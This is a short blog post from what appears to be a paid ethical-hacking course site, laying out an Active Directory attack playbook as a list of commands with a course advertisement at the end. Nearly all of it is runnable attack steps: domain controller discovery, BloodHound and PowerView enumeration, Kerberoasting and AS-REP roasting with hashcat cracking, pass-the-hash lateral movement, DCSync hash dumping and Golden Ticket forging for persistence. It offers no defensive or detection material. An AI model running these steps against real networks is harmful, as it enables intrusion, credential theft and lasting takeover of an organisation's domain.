Back to BlogsEthical Hacking

Active Directory Attacks — Complete AD Hacking Playbook

Anuj Singh (Admin) 31 March 2026 303 views

Active Directory Hacking Playbook

Active Directory is used by 90%+ of enterprise networks. Compromising AD = owning the entire company.

Phase 1: Initial Enumeration

# Without credentials
nmap -p 389,636,88,445 10.10.10.0/24     # Find domain controllers
enum4linux -a 10.10.10.5                   # SMB enumeration
crackmapexec smb 10.10.10.0/24            # SMB scanning

Phase 2: With Low-Privilege User

# BloodHound — Map AD attack paths
bloodhound-python -u user -p pass -ns DC_IP -d domain.com -c all

# PowerView enumeration
Get-DomainUser | Select samaccountname,memberof
Get-DomainGroup "Domain Admins" | Select member
Find-LocalAdminAccess

Phase 3: Privilege Escalation

Kerberoasting

GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
hashcat -m 13100 hashes.txt wordlist.txt

AS-REP Roasting

GetNPUsers.py domain/ -dc-ip DC_IP -usersfile users.txt -no-pass
hashcat -m 18200 hashes.txt wordlist.txt

Phase 4: Lateral Movement

# Pass-the-Hash
crackmapexec smb 10.10.10.0/24 -u admin -H hash --sam

# WMIExec
wmiexec.py domain/admin@target -hashes :ntlmhash

# PSExec
psexec.py domain/admin:pass@target

Phase 5: Domain Dominance

# DCSync — dump all domain hashes
secretsdump.py domain/admin:pass@DC_IP

# Golden Ticket — permanent access
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXX -domain domain.com admin

🔥 Master Active Directory attacks at ONLY4YOU →

Want to Learn This Practically?

Subscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!

Sign Up & SubscribeRead More Blogs

Continue Learning

← All ArticlesBrowse CoursesAbout ONLY4YOU